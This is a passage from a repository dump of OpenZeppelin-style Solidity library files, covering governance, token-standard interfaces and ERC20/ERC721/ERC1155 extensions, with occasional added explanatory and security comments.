     * Read the voting weight from the token's built in snapshot mechanism (see {Governor-_getVotes}).
     *
     * Unlike the two GovernorVotes copies in this tree, this variant forwards
     * `blockNumber` to the token, so the weight is taken at the requested block.
     */
    function _getVotes(
        address account,
        uint256 blockNumber,
        bytes memory /*params*/
    ) internal view virtual override returns (uint256) {
        return token.getPriorVotes(account, blockNumber);
    }
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/governance/extensions/IGovernorTimelock.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (governance/extensions/IGovernorTimelock.sol)

pragma solidity ^0.8.0;

import "../IGovernor.sol";

/**
 * @dev Extension of the {IGovernor} for timelock supporting modules.
 *
 * _Available since v4.3._
 */
abstract contract IGovernorTimelock is IGovernor {
    // NOTE(review): declarations only. The meanings noted below are inferred
    // from the names; confirm against the implementing modules.

    // Presumably emitted when a proposal is queued, with `eta` the time it
    // becomes executable.
    event ProposalQueued(uint256 proposalId, uint256 eta);

    // Presumably the address of the timelock contract in use.
    function timelock() public view virtual returns (address);

    // Presumably the `eta` recorded for `proposalId`.
    function proposalEta(uint256 proposalId) public view virtual returns (uint256);

    // Takes the proposal's targets, values and calldatas together with the
    // hash of its description, and returns the proposal id.
    function queue(
        address[] memory targets,
        uint256[] memory values,
        bytes[] memory calldatas,
        bytes32 descriptionHash
    ) public virtual returns (uint256 proposalId);
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1155.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1155.sol)

pragma solidity ^0.8.0;

import "../token/ERC1155/IERC1155.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1155MetadataURI.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1
(interfaces/IERC1155MetadataURI.sol)

pragma solidity ^0.8.0;

import "../token/ERC1155/extensions/IERC1155MetadataURI.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1155Receiver.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1155Receiver.sol)

pragma solidity ^0.8.0;

import "../token/ERC1155/IERC1155Receiver.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1271.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1271.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC1271 standard signature validation method for
 * contracts as defined in https://eips.ethereum.org/EIPS/eip-1271[ERC-1271].
 *
 * _Available since v4.1._
 */
interface IERC1271 {
    /**
     * @dev Should return whether the signature provided is valid for the provided data
     * @param hash Hash of the data to be signed
     * @param signature Signature byte array associated with the data that `hash` was computed over
     * @return magicValue The ERC-1271 magic value `0x1626ba7e`
     * (`bytes4(keccak256("isValidSignature(bytes32,bytes)"))`) when the
     * signature is valid. Callers must compare the result with that value;
     * a call that merely does not revert proves nothing.
     */
    function isValidSignature(bytes32 hash, bytes memory signature) external view returns (bytes4 magicValue);
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1363Receiver.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1363Receiver.sol)

pragma solidity ^0.8.0;

interface IERC1363Receiver {
    /*
     * Note: the ERC-165 identifier for this interface is 0x88a7ca5c.
     * 0x88a7ca5c === bytes4(keccak256("onTransferReceived(address,address,uint256,bytes)"))
     */

    /**
     * @notice Handle the receipt of ERC1363 tokens
     * @dev Any ERC1363 smart contract calls this function on the recipient
     * after a `transfer` or a `transferFrom`. This function MAY throw to revert and reject the
     * transfer. Return of other than the magic value MUST result in the
     * transaction being reverted.
     * Note: the token contract address is always the message sender.
     * Because the function is external, an implementation that acts on the
     * callback should check `msg.sender` against the token it expects.
     * @param operator address The address which called `transferAndCall` or `transferFromAndCall` function
     * @param from address The address from which the tokens are transferred
     * @param value uint256 The amount of tokens transferred
     * @param data bytes Additional data with no specified format
     * @return `bytes4(keccak256("onTransferReceived(address,address,uint256,bytes)"))`
     *  unless throwing
     */
    function onTransferReceived(
        address operator,
        address from,
        uint256 value,
        bytes memory data
    ) external returns (bytes4);
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1363Spender.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1363Spender.sol)

pragma solidity ^0.8.0;

interface IERC1363Spender {
    /*
     * Note: the ERC-165 identifier for this interface is 0x7b04a2d0.
     * 0x7b04a2d0 === bytes4(keccak256("onApprovalReceived(address,uint256,bytes)"))
     */

    /**
     * @notice Handle the approval of ERC1363 tokens
     * @dev Any ERC1363 smart contract calls this function on the recipient
     * after an `approve`. This function MAY throw to revert and reject the
     * approval. Return of other than the magic value MUST result in the
     * transaction being reverted.
     * Note: the token contract address is always the message sender.
     * Because the function is external, an implementation that acts on the
     * callback should check `msg.sender` against the token it expects.
     * @param owner address The address which called `approveAndCall` function
     * @param value uint256 The amount of tokens to be spent
     * @param data bytes Additional data with no specified format
     * @return `bytes4(keccak256("onApprovalReceived(address,uint256,bytes)"))`
     *  unless throwing
     */
    function onApprovalReceived(
        address owner,
        uint256 value,
        bytes memory data
    ) external returns (bytes4);
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC165.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC165.sol)

pragma solidity ^0.8.0;

import "../utils/introspection/IERC165.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1820Implementer.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1820Implementer.sol)

pragma solidity ^0.8.0;

import "../utils/introspection/IERC1820Implementer.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC1820Registry.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (interfaces/IERC1820Registry.sol)

pragma solidity ^0.8.0;

import "../utils/introspection/IERC1820Registry.sol";

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC20.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC20.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/IERC20.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC20Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC20Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/extensions/IERC20Metadata.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC2981.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (interfaces/IERC2981.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../utils/introspection/IERC165.sol"; 7 | 8 | /** 9 | * @dev Interface for the NFT Royalty Standard. 10 | * 11 | * A standardized way to retrieve royalty payment information for non-fungible tokens (NFTs) to enable universal 12 | * support for royalty payments across all NFT marketplaces and ecosystem participants. 13 | * 14 | * _Available since v4.5._ 15 | */ 16 | interface IERC2981 is IERC165 { 17 | /** 18 | * @dev Returns how much royalty is owed and to whom, based on a sale price that may be denominated in any unit of 19 | * exchange. The royalty amount is denominated and should be paid in that same unit of exchange.
20 | */ 21 | function royaltyInfo(uint256 tokenId, uint256 salePrice) 22 | external 23 | view 24 | returns (address receiver, uint256 royaltyAmount); 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC3156FlashBorrower.sol"; 7 | import "./IERC3156FlashLender.sol"; 8 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156FlashBorrower.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156FlashBorrower.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC3156 FlashBorrower, as defined in 8 | * https://eips.ethereum.org/EIPS/eip-3156[ERC-3156]. 9 | * 10 | * _Available since v4.1._ 11 | */ 12 | interface IERC3156FlashBorrower { 13 | /** 14 | * @dev Receive a flash loan. The interface itself does not restrict who may call this function, so an implementation should check that `msg.sender` is a lender it trusts and that `initiator` is an address it expects before acting on the loan (see the security considerations of ERC-3156). 15 | * @param initiator The initiator of the loan. 16 | * @param token The loan currency. 17 | * @param amount The amount of tokens lent. 18 | * @param fee The additional amount of tokens to repay. 19 | * @param data Arbitrary data structure, intended to contain user-defined parameters.
20 | * @return The keccak256 hash of "ERC3156FlashBorrower.onFlashLoan" 21 | */ 22 | function onFlashLoan( 23 | address initiator, 24 | address token, 25 | uint256 amount, 26 | uint256 fee, 27 | bytes calldata data 28 | ) external returns (bytes32); 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156FlashLender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156FlashLender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC3156FlashBorrower.sol"; 7 | 8 | /** 9 | * @dev Interface of the ERC3156 FlashLender, as defined in 10 | * https://eips.ethereum.org/EIPS/eip-3156[ERC-3156]. 11 | * 12 | * _Available since v4.1._ 13 | */ 14 | interface IERC3156FlashLender { 15 | /** 16 | * @dev The amount of currency available to be lent. 17 | * @param token The loan currency. 18 | * @return The amount of `token` that can be borrowed. 19 | */ 20 | function maxFlashLoan(address token) external view returns (uint256); 21 | 22 | /** 23 | * @dev The fee to be charged for a given loan. 24 | * @param token The loan currency. 25 | * @param amount The amount of tokens lent. 26 | * @return The amount of `token` to be charged for the loan, on top of the returned principal. 27 | */ 28 | function flashFee(address token, uint256 amount) external view returns (uint256); 29 | 30 | /** 31 | * @dev Initiate a flash loan. 32 | * @param receiver The receiver of the tokens in the loan, and the receiver of the callback. 33 | * @param token The loan currency. 34 | * @param amount The amount of tokens lent. 35 | * @param data Arbitrary data structure, intended to contain user-defined parameters.
36 | */ 37 | function flashLoan( 38 | IERC3156FlashBorrower receiver, 39 | address token, 40 | uint256 amount, 41 | bytes calldata data 42 | ) external returns (bool); 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/IERC721.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Enumerable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Enumerable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/extensions/IERC721Enumerable.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/extensions/IERC721Metadata.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/IERC721Receiver.sol"; 7 | --------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/interfaces/IERC777.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC777Recipient.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777Recipient.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777Recipient.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC777Sender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777Sender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777Sender.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/README.adoc: -------------------------------------------------------------------------------- 1 | = Interfaces 2 | 3 | [.readme-notice] 4 | NOTE: This document is better viewed at https://docs.openzeppelin.com/contracts/api/interfaces 5 | 6 | == List of standardized interfaces 7 | These interfaces are available as `.sol` files, and also as compiler `.json` ABI files (through the npm package). These 8 | are useful to interact with third party contracts that implement them.
9 | 10 | - {IERC20} 11 | - {IERC20Metadata} 12 | - {IERC165} 13 | - {IERC721} 14 | - {IERC721Receiver} 15 | - {IERC721Enumerable} 16 | - {IERC721Metadata} 17 | - {IERC777} 18 | - {IERC777Recipient} 19 | - {IERC777Sender} 20 | - {IERC1155} 21 | - {IERC1155Receiver} 22 | - {IERC1155MetadataURI} 23 | - {IERC1271} 24 | - {IERC1363} 25 | - {IERC1820Implementer} 26 | - {IERC1820Registry} 27 | - {IERC2612} 28 | - {IERC2981} 29 | - {IERC3156FlashLender} 30 | - {IERC3156FlashBorrower} 31 | 32 | == Detailed ABI 33 | 34 | {{IERC1271}} 35 | 36 | {{IERC1363}} 37 | 38 | {{IERC1363Receiver}} 39 | 40 | {{IERC1820Implementer}} 41 | 42 | {{IERC1820Registry}} 43 | 44 | {{IERC2612}} 45 | 46 | {{IERC2981}} 47 | 48 | {{IERC3156FlashLender}} 49 | 50 | {{IERC3156FlashBorrower}} 51 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/draft-IERC1822.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (interfaces/draft-IERC1822.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev ERC1822: Universal Upgradeable Proxy Standard (UUPS) documents a method for upgradeability through a simplified 8 | * proxy whose upgrades are fully controlled by the current implementation. 9 | */ 10 | interface IERC1822Proxiable { 11 | /** 12 | * @dev Returns the storage slot that the proxiable contract assumes is being used to store the implementation 13 | * address. 14 | * 15 | * IMPORTANT: A proxy pointing at a proxiable contract should not be considered proxiable itself, because this risks 16 | * bricking a proxy that upgrades to it, by delegating to itself until out of gas. Thus it is critical that this 17 | * function revert if invoked through a proxy.
18 | */ 19 | function proxiableUUID() external view returns (bytes32); 20 | } 21 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/draft-IERC2612.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/draft-IERC2612.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/extensions/draft-IERC20Permit.sol"; 7 | 8 | interface IERC2612 is IERC20Permit {} 9 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/ERC1155Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/ERC1155Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC1155.sol"; 7 | 8 | /** 9 | * @dev Extension of {ERC1155} that allows token holders to destroy both their 10 | * own tokens and those that they have been approved to use. Both `burn` and `burnBatch` revert unless the caller is `account` or is approved for all of `account`'s tokens via `isApprovedForAll`.
11 | * 12 | * _Available since v3.1._ 13 | */ 14 | abstract contract ERC1155Burnable is ERC1155 { 15 | function burn( 16 | address account, 17 | uint256 id, 18 | uint256 value 19 | ) public virtual { 20 | require( 21 | account == _msgSender() || isApprovedForAll(account, _msgSender()), 22 | "ERC1155: caller is not owner nor approved" 23 | ); 24 | 25 | _burn(account, id, value); 26 | } 27 | 28 | function burnBatch( 29 | address account, 30 | uint256[] memory ids, 31 | uint256[] memory values 32 | ) public virtual { 33 | require( 34 | account == _msgSender() || isApprovedForAll(account, _msgSender()), 35 | "ERC1155: caller is not owner nor approved" 36 | ); 37 | 38 | _burnBatch(account, ids, values); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/ERC1155Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/ERC1155Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC1155.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC1155 token with pausable token transfers, minting and burning. 11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | * 16 | * _Available since v3.1._ 17 | */ 18 | abstract contract ERC1155Pausable is ERC1155, Pausable { 19 | /** 20 | * @dev See {ERC1155-_beforeTokenTransfer}. 21 | * 22 | * Requirements: 23 | * 24 | * - the contract must not be paused.
25 | */ 26 | function _beforeTokenTransfer( 27 | address operator, 28 | address from, 29 | address to, 30 | uint256[] memory ids, 31 | uint256[] memory amounts, 32 | bytes memory data 33 | ) internal virtual override { 34 | super._beforeTokenTransfer(operator, from, to, ids, amounts, data); 35 | 36 | require(!paused(), "ERC1155Pausable: token transfer while paused"); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/IERC1155MetadataURI.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/IERC1155MetadataURI.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC1155.sol"; 7 | 8 | /** 9 | * @dev Interface of the optional ERC1155MetadataExtension interface, as defined 10 | * in the https://eips.ethereum.org/EIPS/eip-1155#metadata-extensions[EIP]. 11 | * 12 | * _Available since v3.1._ 13 | */ 14 | interface IERC1155MetadataURI is IERC1155 { 15 | /** 16 | * @dev Returns the URI for token type `id`. 17 | * 18 | * If the `\{id\}` substring is present in the URI, it must be replaced by 19 | * clients with the actual token type ID. 20 | */ 21 | function uri(uint256 id) external view returns (string memory); 22 | } 23 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative.
2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/utils/ERC1155Holder.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC1155/utils/ERC1155Holder.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./ERC1155Receiver.sol"; 7 | 8 | /** 9 | * Simple implementation of `ERC1155Receiver` that will allow a contract to hold ERC1155 tokens. Both hooks ignore every argument and return their own selector, so any incoming transfer is accepted. 10 | * 11 | * IMPORTANT: When inheriting this contract, you must include a way to use the received tokens, otherwise they will be 12 | * stuck. 13 | * 14 | * @dev _Available since v3.1._ 15 | */ 16 | contract ERC1155Holder is ERC1155Receiver { 17 | function onERC1155Received( 18 | address, 19 | address, 20 | uint256, 21 | uint256, 22 | bytes memory 23 | ) public virtual override returns (bytes4) { 24 | return this.onERC1155Received.selector; 25 | } 26 | 27 | function onERC1155BatchReceived( 28 | address, 29 | address, 30 | uint256[] memory, 31 | uint256[] memory, 32 | bytes memory 33 | ) public virtual override returns (bytes4) { 34 | return this.onERC1155BatchReceived.selector; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/utils/ERC1155Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/utils/ERC1155Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC1155Receiver.sol"; 7 | import "../../../utils/introspection/ERC165.sol"; 8 | 9 | /** 10 | * @dev _Available since v3.1._ 11 | */ 12 | abstract contract ERC1155Receiver is ERC165, IERC1155Receiver { 13 | /** 14 | * @dev See {IERC165-supportsInterface}.
15 | */ 16 | function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { 17 | return interfaceId == type(IERC1155Receiver).interfaceId || super.supportsInterface(interfaceId); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | import "../../../utils/Context.sol"; 8 | 9 | /** 10 | * @dev Extension of {ERC20} that allows token holders to destroy both their own 11 | * tokens and those that they have an allowance for, in a way that can be 12 | * recognized off-chain (via event analysis). 13 | */ 14 | abstract contract ERC20Burnable is Context, ERC20 { 15 | /** 16 | * @dev Destroys `amount` tokens from the caller. 17 | * 18 | * See {ERC20-_burn}. 19 | */ 20 | function burn(uint256 amount) public virtual { 21 | _burn(_msgSender(), amount); 22 | } 23 | 24 | /** 25 | * @dev Destroys `amount` tokens from `account`, deducting from the caller's 26 | * allowance. 27 | * 28 | * See {ERC20-_burn} and {ERC20-allowance}. 29 | * 30 | * Requirements: 31 | * 32 | * - the caller must have allowance for ``account``'s tokens of at least 33 | * `amount`.
34 | */ 35 | function burnFrom(address account, uint256 amount) public virtual { 36 | _spendAllowance(account, _msgSender(), amount); 37 | _burn(account, amount); 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Capped.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/ERC20Capped.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | 8 | /** 9 | * @dev Extension of {ERC20} that adds a cap to the supply of tokens. 10 | */ 11 | abstract contract ERC20Capped is ERC20 { 12 | uint256 private immutable _cap; 13 | 14 | /** 15 | * @dev Sets the value of the `cap`. This value is immutable, it can only be 16 | * set once during construction. 17 | */ 18 | constructor(uint256 cap_) { 19 | require(cap_ > 0, "ERC20Capped: cap is 0"); 20 | _cap = cap_; 21 | } 22 | 23 | /** 24 | * @dev Returns the cap on the token's total supply. 25 | */ 26 | function cap() public view virtual returns (uint256) { 27 | return _cap; 28 | } 29 | 30 | /** 31 | * @dev See {ERC20-_mint}. Reverts with "ERC20Capped: cap exceeded" if minting `amount` would raise the total supply above {cap}. 32 | */ 33 | function _mint(address account, uint256 amount) internal virtual override { 34 | require(ERC20.totalSupply() + amount <= cap(), "ERC20Capped: cap exceeded"); 35 | super._mint(account, amount); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/ERC20Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC20 token with pausable token transfers, minting and burning.
11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | */ 16 | abstract contract ERC20Pausable is ERC20, Pausable { 17 | /** 18 | * @dev See {ERC20-_beforeTokenTransfer}. 19 | * 20 | * Requirements: 21 | * 22 | * - the contract must not be paused. 23 | */ 24 | function _beforeTokenTransfer( 25 | address from, 26 | address to, 27 | uint256 amount 28 | ) internal virtual override { 29 | super._beforeTokenTransfer(from, to, amount); 30 | 31 | require(!paused(), "ERC20Pausable: token transfer while paused"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/IERC20Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC20.sol"; 7 | 8 | /** 9 | * @dev Interface for the optional metadata functions from the ERC20 standard. 10 | * 11 | * _Available since v4.1._ 12 | */ 13 | interface IERC20Metadata is IERC20 { 14 | /** 15 | * @dev Returns the name of the token. 16 | */ 17 | function name() external view returns (string memory); 18 | 19 | /** 20 | * @dev Returns the symbol of the token. 21 | */ 22 | function symbol() external view returns (string memory); 23 | 24 | /** 25 | * @dev Returns the number of decimal places of the token.
26 | */ 27 | function decimals() external view returns (uint8); 28 | } 29 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/presets/ERC20PresetFixedSupply.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/presets/ERC20PresetFixedSupply.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | import "../extensions/ERC20Burnable.sol"; 6 | 7 | /** 8 | * @dev {ERC20} token, including: 9 | * 10 | * - Preminted initial supply 11 | * - Ability for holders to burn (destroy) their tokens 12 | * - No access control mechanism (for minting/pausing) and hence no governance 13 | * 14 | * This contract uses {ERC20Burnable} to include burn capabilities - head to 15 | * its documentation for details. 16 | * 17 | * _Available since v3.4._ 18 | * 19 | * _Deprecated in favor of https://wizard.openzeppelin.com/[Contracts Wizard]._ 20 | */ 21 | contract ERC20PresetFixedSupply is ERC20Burnable { 22 | /** 23 | * @dev Mints `initialSupply` amount of token and transfers them to `owner`. 24 | * 25 | * See {ERC20-constructor}. 26 | */ 27 | constructor( 28 | string memory name, 29 | string memory symbol, 30 | uint256 initialSupply, 31 | address owner 32 | ) ERC20(name, symbol) { 33 | _mint(owner, initialSupply); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative.
2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/IERC721Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @title ERC721 token receiver interface 8 | * @dev Interface for any contract that wants to support safeTransfers 9 | * from ERC721 asset contracts. 10 | */ 11 | interface IERC721Receiver { 12 | /** 13 | * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} 14 | * by `operator` from `from`, this function is called. 15 | * 16 | * It must return its Solidity selector to confirm the token transfer. 17 | * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. 18 | * 19 | * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. 20 | */ 21 | function onERC721Received( 22 | address operator, 23 | address from, 24 | uint256 tokenId, 25 | bytes calldata data 26 | ) external returns (bytes4); 27 | } 28 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/ERC721Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../utils/Context.sol"; 8 | 9 | /** 10 | * @title ERC721 Burnable Token 11 | * @dev ERC721 Token that can be irreversibly burned (destroyed). 12 | */ 13 | abstract contract ERC721Burnable is Context, ERC721 { 14 | /** 15 | * @dev Burns `tokenId`. See {ERC721-_burn}. 
